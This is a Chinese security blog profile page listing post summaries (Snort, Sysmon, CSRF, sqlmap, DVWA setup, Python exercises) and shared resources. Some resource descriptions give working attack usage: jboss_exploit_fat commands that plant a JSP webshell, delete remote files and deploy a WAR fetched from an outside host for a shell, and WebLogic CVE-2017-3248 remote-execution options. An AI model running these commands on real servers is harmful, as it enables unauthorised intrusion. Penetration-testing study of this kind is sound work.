自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(29)
  • 资源 (10)
  • 收藏
  • 关注

原创 Snort安装与配置

简介Snort是一个多平台(Multi-Platform),实时(Real-Time)流量分析,网络IP数据包(Pocket)记录等特性的强大的网络入侵检测/防御系统(Network Intrusion Detection/Prevention System),即NIDS/NIPS。Snort采用规则匹配机制检测网络分组是否违反了事先配置的安全策略。安装在一台主机上就可以监测整个共享网段,一旦发现入侵和探测行为,即有将报警信息发送到系统日志、报警文件或控制台屏幕等多种实时报警方式。Snort不仅能够检测

2021-03-07 18:41:35 1901 3

原创 Sysmon笔记

官网介绍系统监视器(Sysmon)是Windows系统服务和设备驱动程序,一旦安装在系统上,便会驻留在系统重新引导期间,以监视系统活动并将其记录到Windows事件日志中。它提供有关进程创建,网络连接以及文件创建时间更改的详细信息。通过收集使用Windows Event Collection 或 SIEM 代理生成的事件并随后对其进行分析,您可以识别恶意或异常活动,并了解入侵者和恶意软件如何在您的网络上运行。请注意,Sysmon不提供对其生成的事件的分析,也不会尝试保护自己或使其免受攻击者的侵害...

2021-03-07 17:41:15 600

转载 CSRF简单介绍及利用方法

x00 简要介绍CSRF(Cross-site request forgery)跨站请求伪造,由于目标站无token/referer限制,导致攻击者可以用户的身份完成操作达到各种目的。根据HTTP请求方式,CSRF利用方式可分为两种。 0x01 GET类型的CSRF这种类型的CSRF一般是由于程序员安全意识不强造成的。GET类型的CSRF利用非常简单,只需要

2017-01-17 16:59:53 454

转载 查询网址汇总

一、查企业查信用1、信用中国查询内容:工商注册企业和个人、行政许可和处罚网址:http://www.creditchina.gov.cn/ 2、全国企业信用信息公示查询内容:全国企业工商登记注册信息http://gsxt.saic.gov.cn/(导航)http://gsxt.saic.gov.cn/zjgs/(总局) 

2016-12-22 15:58:58 6338

原创 SQLMap--SQLMap使用方法

sqlmap.py -u "xxxx" --dbs  列出所有的数据库sqlmap.py -u "xxxx" --current-db  当前数据库sqlmap.py -u "xxxx" --current-user  当前数据库用户sqlmap.py -u "xxxx" -D 数据库名 --tables  当前数据库有多少表sqlmap.py -u "xxxx" -T 表名

2016-12-17 19:58:23 433

转载 在Windows/linux中安装Nessus

转载自:http://blog.sina.com.cn/s/blog_8a1ce70f0102wkcw.htmlNessus基础知识Nessus号称是世界上最流行的漏洞扫描程序,全世界有超过75000个组织在使用它。该工具提供完整的电脑漏洞扫描服务,并随时更新其漏洞数据库。Nessus不同于传统的漏洞扫描软件,Nessus可同时在本机或远端上遥控,进行系统的漏洞分析扫描。对应渗透测

2016-12-02 15:11:25 5368

转载 VMware Workstation虚拟机打开 .vmx 文件没有反应--解决办法

来源:https://zhidao.baidu.com/question/500252212.html?sort=9&rn=5&pn=15#wgt-answers方法1:关闭VMs方法:英文版:Edit=>Preferences=>Share VMs 点击 Disable Sharing,点击后会变成 Enable Sharing,即可正常打开虚拟机。中文版:VMware Wo

2016-11-27 01:15:45 28408 5

原创 DVWA--登录页面错误问题“解决办法”

Fatal error: Uncaught exception 'PDOException' with message ' in D:\DVWA\wamp\www\DVWA-1.9\dvwa\includes\dvwaPage.inc.php on line 469PDOException: in D:\DVWA\wamp\www\DVWA-1.9\dvwa\includes\dvwaPa

2016-11-15 22:11:21 13363 1

转载 Windows下DVWA安装指南

转载自:http://webaq.lofter.com/post/37ddcc_1439af0注意:DVWA需要依赖httpd、PHP、MySQL、php-mysql等应用或组件,最简单的方法是安装wampserver(http://www.wampserver.com/),安装完了所需的各种依赖部件全部搞定。1、下载DVWA(http://www.dvwa.co.uk/)

2016-11-14 19:39:03 3861 2

转载 Windows 10如何配置本地WAMPSERVER测试环境

http://jingyan.baidu.com/article/b0b63dbf1993f74a483070ef.html所遇到的问题:一:80端口被IIS占用。解决办法:①禁用/卸载IIS(服务里面)。    ②修改Apache的端口。右击Wampserver--Apache--打开httpd.conf--找到Listen 0.0.0.0:80,把80修改掉,例如:81

2016-11-14 19:29:45 841

原创 Linux忘记登录密码--重置/修改密码

重启电脑1:此页面按E键2:选第2个3:空格+s+回车4:按B键whoami 查看当前用户passwd 修改当前用户密码注:passwd admin 修改admin用户密码重启!!!

2016-10-19 14:48:53 1084

原创 习题15--读取文件

这个习题涉及写两个文件:一个是正常的ex15.py文件,另外一个是ex15_sample.txt下面是该文本内容:This is stuff I typed into a file.It is really cool stuff.Lots and lots of fun to have in here.一:代码from sys import argvscript, file

2016-10-17 00:58:24 2867

原创 习题14--提示和传递

一:代码from sys import argvscript, user_name = argvprompt = '> 'print "Hi %s, I'm the %s script." % (user_name, script)print "I'd like to ask you a few questions."print "Do you like me %s?" % us

2016-10-16 23:02:44 474

原创 习题13--参数、解包和变量

一:代码from sys import argvscript, first, second, third = argvprint "The script is called:", scriptprint "Your first variable is:", firstprint "Your second variable is:", secondprint "Your third

2016-10-11 23:54:02 1715

原创 习题12--raw_input()提示别人

对于raw_input()而言,你可以让它显示出一个提示,从而告诉别人应该输入什么。一:代码age = raw_input("How old are you? ")height = raw_input("How tall are you? ")weight = raw_input("How much do you weight? ")print "So, you're %r old

2016-10-08 07:53:28 2341 1

原创 习题11--提问

一:代码print "How old are you?",age = raw_input()print "How tall are you??",height = raw_input()print "How much do you weigh?",weight = raw_input()print "So, you're %r old, %r tall and %r heavy.

2016-09-28 23:25:10 408

原创 习题10--转义字符

一:代码# _*_ coding:utf-8 _*_tabby_cat = "\tI'm tabbed in." # \t水平制表符persian_cat = "I'm split\non a line." # \n 换行符backslash_cat = "I'm \\ a \\ cat."fat_cat = """I'll do a list:\t* Cat food\t*

2016-09-26 22:55:28 2185

原创 习题9--打印,打印,打印

一:代码# Here's some new strange stuff, remember type it exactly.days = "Mon Tue Wed Thu Fri Sat Sun"months = "Jan\nFed\nMar\nApr\nMay\nJun\nJul\nAug"print "Here are the days: ",daysprint "Here a

2016-09-26 22:51:00 312

原创 习题8--打印,打印

一:代码formatter = "%r %r %r %r"print formatter % (1, 2, 3, 4)print formatter % ("one", "two", "three", "four")print formatter % (True, False, False, True)print formatter % (formatter, formatter,

2016-09-26 22:48:30 352

原创 习题7--更多打印

一:代码print "Mary had a little lamb."print "Its fleece was white as %s." % 'snow'print "And everywhere that Mary went."print "." * 10 # what'd that do?end1 = "C"end2 = "h"end3 = "e"end4 = "e"

2016-09-25 20:37:18 439

原创 习题6--字符串和文本

一:代码x = "There are %d types of people." % 10binary = "binary"do_not = "don't"y = "Those who know %s and those who %s" % (binary, do_not)print xprint yprint "I said: %r." % xprint "I also sa

2016-09-24 23:36:04 931

原创 习题5--更多的变量和打印

一:代码my_name = 'Zed A. Shaw'my_age = 35 # not a liemy_height = 74 #inchesmy_weight = 180 # lbsmy_eyes = 'Blue'my_teeth = 'White'my_hair = 'Brown'print "Let's talk about %s." % my_nameprint "

2016-09-24 00:53:03 727

原创 习题4--变量和命名

一:代码cars = 100space_in_a_car = 4.0drivers = 30passengers = 90cars_not_driven = cars - driverscars_driven = driverscarpool_capacity = cars_driven * space_in_a_caraverage_passengers_per_car = p

2016-09-24 00:38:35 422

原创 习题3--数字与数学计算

一:代码print "I will now count my chickens:"print "Hens", 25 + 30 / 6print "Rooters", 100 - 25 * 3 % 4print "Now I will count the eggs:"print 3 + 2 + 1 - 5 + 4 % 2 - 1 / 4 + 6print "Is it true

2016-09-24 00:35:20 871 1

原创 习题2--注释和#符号

一:代码:# A comment, this is so you can read your program later.# Anything after the # is ignored by python.print "I could have code like this." # and the comment after is ignored# You can also us

2016-09-24 00:29:10 464

原创 习题1--第一个程序

一:代码print "Hello World!"print "Hello Again"print "I like typing this."print "This is fun."print "Yay! Printing."print "I'd much rather you 'not'."print 'I "said" do not touch this.'二:附加练习

2016-09-24 00:25:38 546

转载 c++学习的50条忠告

转载自勉         1.把C++当成一门新的语言学习(和C没啥关系!真的。);     2.看《Thinking In C++》,不要看《C++变成死相》;     3.看《The C++ Programming Language》和《Inside The C++ Object Model》,不要因为他们很难而我们自己是初学者所以就不看;     4.不要被V

2015-06-01 22:43:50 486 2

原创 《C Primer Plus 》 第二章总结

1:C语言程序是由一个或者多个函数组成的。每一个C程序都必须包含一个名为“main()”的函数,因为当程序开始时要调用该函数。一个简单的函数结构如下,函数头后面紧跟着一个开始花括号,后面是构成函数体的语句,然后是起终止作用的结束花括号。#include  int main(void){int num1,num2;nu

2015-05-30 22:08:01 422

原创 01---C语言的优缺点

1:C语言的优点1):强大的控制结构 。2):快速。3):紧凑的代码---程序更小。4):可移植到其他计算机。2:C语言的缺点1):c在表达方面的自由会增加风险。。。。{网络搜集的---C语言优点   1. 简洁紧凑、灵活方便   C语言一共只有32个关键字,9种控制语句,程序书写形式自

2015-05-27 19:06:55 607

Crafting the InfoSec Playbook.pdf

如果你正在阅读这篇文章,那么你很有可能希望增强你的威胁检测能力和技术,提升你作为信息安全、事件响应和网络防御者或管理者的游戏水平。在过去的几年中,规模、复杂性和轮廓的威胁都在急剧发展,并持续增加。正确的检测和反应需要更多的努力和复杂才能保持有效。建立、完善和维护一个有效的事件响应团队并非易事。我们已经与数百个不同类型和规模的安全团队进行了交谈,他们正在攻击者与其组织的网络、用户和信息之间展开同样的战争。很少有人做得好,但有了坚实的战略、正确的专业知识和正确的基础设施,你就能与坏人竞争。 任何一个好的攻击者都会告诉你,昂贵的安全监视和预防工具不足以保证你的安全。成功的计算机安全事件响应小组(C

2019-11-15

Metasploit渗透测试指南

Metasploit渗透测试指南

2018-09-20

RDP下述X224协议详解

RDP下述X224协议详解&RDP;下述X224协议详解&RDP;下述X224协议详解

2018-09-18

Kali Linux 安全渗透技术教程

Kali Linux 安全渗透技术教程-----Kali Linux 安全渗透技术教程----2017年7月出的

2018-09-06

WebLogic反序列化_CVE-2017-3248

WebLogic反序列化_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C (执行命令)Execute Command[need set] -dst path to dst file -H (执行主机)Remote Host[need set] -https enable https or tls -noExecPath custom execute path -os (操作系统类型)Os Type [windows,linux] -P (远程端口)Remote Port[need set] -shell enable shell module -src path to src file -T Payload Type[marshall, collection, streamMessageImpl] -U Uninstall rmi -upload enable upload a file

2018-09-06

java反序列香草

jboss、weblogic等反序列化漏洞图形化工具。 jboss、weblogic等反序列化漏洞图形化工具。

2018-09-06

jboss_exploit_fat

1. 查看系统名称 java -jar jboss_exploit_fat.jar -i http://123.232.119.98:9009/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName 2. 查看系统版本 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion 3.远程创建文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository store myname.war index .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean $content$内容是同目录下的shell.jsp文件内容 即:将shell.jsp文件上传到服务器上,最终部署的war访问: http://192.168.7.84:10081/myname/index.jsp 如果有mynameok 表示部署成功 使用client.htm客户端进行连接即可(需要修改ip等信息) 4.远程部署war java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://scriptsgenie.com/demo/test.war 获得shell地址: http://192.168.7.84:10081/test/shell.jsp 5.远程删除文件D:\jboss\server\default\deploy\management\myname.war\index.jsp文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 6.支持输入用户名和密码 带验证的情况 java -jar jboss_exploit_fat.jar -u name -p password -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 7.支持代理模式 java -jar jboss_exploit_fat.jar -P http://127.0.0.1:8080 -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp

2018-09-06

中国互联网地下产业链分析白皮书.pdf

中国互联网地下产业链分析白皮书.pdf

2017-08-16

Python灰帽子.pdf

Python灰帽子.pdf

2016-10-09

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除